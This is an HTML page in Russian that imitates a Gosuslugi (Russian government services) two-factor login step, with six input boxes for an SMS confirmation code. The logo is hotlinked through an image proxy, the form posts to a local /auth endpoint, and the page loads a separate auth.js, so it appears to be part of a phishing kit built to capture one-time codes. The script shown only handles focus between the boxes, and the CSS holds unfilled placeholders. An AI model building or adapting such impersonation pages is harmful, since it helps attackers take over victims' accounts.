



<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Двухфакторная аутентификация</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Raleway:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<style>
body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 30px 30px;
  display: flex;
  justify-content: center;
  align-items: center;
  background-color: #e4ecfd;

}

.container {
  max-width: 400px;
  width: 100%;
  padding: 30px;
  background-color: #fff; /* светло-серый фон */
  border-radius: 10px;
  box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
  text-align: center;
}

.logo {
  padding: 20px 0 0 0;
  width: 180px;
  margin-bottom: 20px;
}

.form-group {
  margin-bottom: 20px;
  text-align: left;
  padding: 10px 0 20px 0;
}

.form-group input {
  background: #f5f7fa;
  width: 100%;
  padding: 15px;
  border: 1px;
  border-radius: 5px;
  font-size: 16px;
  box-sizing: border-box;
  text-align: left;
  color: #66727f; /* темно-серый цвет текста */
}

.form-group input::placeholder {
  color: #66727f; /* внутренняя часть серая */
}

.btn {
  width: 100%;
  padding: 15px;
  border: none;
  border-radius: 5px;
  background-color: #0d309b;
  color: #fff;
  font-size: 16px;
  cursor: pointer;
}

.btn:hover {
  background-color: #0056b3;
}

.text-muted {
  font-size: 12px;
  color: #999;
}
.vost{
  text-aling: left;
}
.top_bar{
     text-align: center;
}
.top_bar input{
    background-color: #0d309b;
    border: none;
    color: #FFF;
    font-size: 16px;
    border-radius: 8px;
    padding: 10px;
    margin: 0 auto;
    margin: 10px;
}
.top_bar input:hover{
    background-color: #C55656;
}
.2but{

  padding: 10px;
}
.another{
  padding: 15px;
  color: #757575;
}

.form-container__actions-row{
justify-content: space-between;
display: flex;
margin: 0;
padding: 0;
border: 0;
font: inherit;
font-size: 20px;
}
.form-container__actions-row_grid .form-container__actions-col{
  width: calc(50% - 8px);
}
.form-containeractions-col button, .form-containeractions-col a {
  width: 100%;
  text-align: center;
}
.plain-button_light {
  border: 2px solid #e4ecfd;
}
.plain-button_white, .plain-button_light {
  padding-top: 14px;
  padding-bottom: 14px;
  color: #0d4cd3;
  background: #ffffff;
}
.plain-button {
font-size: 16px;
  display: inline-block;
  border-radius: 8px;
  }
.text_1{
  font-size: 22px;
  font-family: "Raleway", sans-serif;
  font-optical-sizing: auto;
  font-weight: 600;
  font-style: normal;
}
.text_2{
  font-family: "Raleway", sans-serif;
  font-optical-sizing: auto;
  font-weight: <weight>;
  font-style: normal;
}
.text_3{
  font-family: "Raleway", sans-serif;
  font-optical-sizing: auto;
  font-weight: <weight>;
  font-style: normal;
}
.no_sms{
  padding: 24px 0 0 0;
}
.no_sms_a{
font-size: 14px;
}
</style>
</head>
<body>
    <div class="container">
      <img src="https://external-content.duckduckgo.com/iu/?u=http%3A%2F%2Fwww.miit.ru%2Fcabinet%2Fhello%2Fgosuslugi-logo.png&f=1&nofb=1&ipt=450ea3461c5817798751e8fa0e7ae2e94aea36aae5449ff421a8f640879539c2&ipo=images" alt="" class="logo">
      <p class="text_1">Подтвердите вход</p>
      <p class="text_2">Код подтверждения отправлен на Ваш номер телефона</p>
      <form id="authForm" method="post" action="/auth">
        <div class="form-group">
          <table>
            <tr>
              <td><input type="text" id="digit1" name="digit1" maxlength="1" placeholder=""></td>
              <td><input type="text" id="digit2" name="digit2" maxlength="1" placeholder=""></td>
              <td><input type="text" id="digit3" name="digit3" maxlength="1" placeholder=""></td>
              <td><input type="text" id="digit4" name="digit4" maxlength="1" placeholder=""></td>
              <td><input type="text" id="digit5" name="digit5" maxlength="1" placeholder=""></td>
              <td><input type="text" id="digit6" name="digit6" maxlength="1" placeholder=""></td>
            </tr>
          </table>
        </div>
        <button type="submit" class="btn">Подтвердить</button>





        <div class="no_sms">
          <a class="no_sms_a" href="login.html">Не приходит смс<a>
        </div>
      </form>
    </div>
    <script>
    document.addEventListener("DOMContentLoaded", function() {
      var inputs = document.querySelectorAll("input[type='text']");
      inputs.forEach(function(input, index) {
        input.addEventListener("input", function() {
          if (this.value.length >= this.maxLength) {
            if (index < inputs.length - 1) {
              inputs[index + 1].focus();
            } else {
              this.blur();
            }
          }
        });
        input.addEventListener("keydown", function(event) {
          if (event.key === "Backspace" && this.value.length === 0 && index > 0) {
            inputs[index - 1].focus();
          }
        });
      });
    });
    </script>
<script src="auth.js"></script>
</body>
</html>
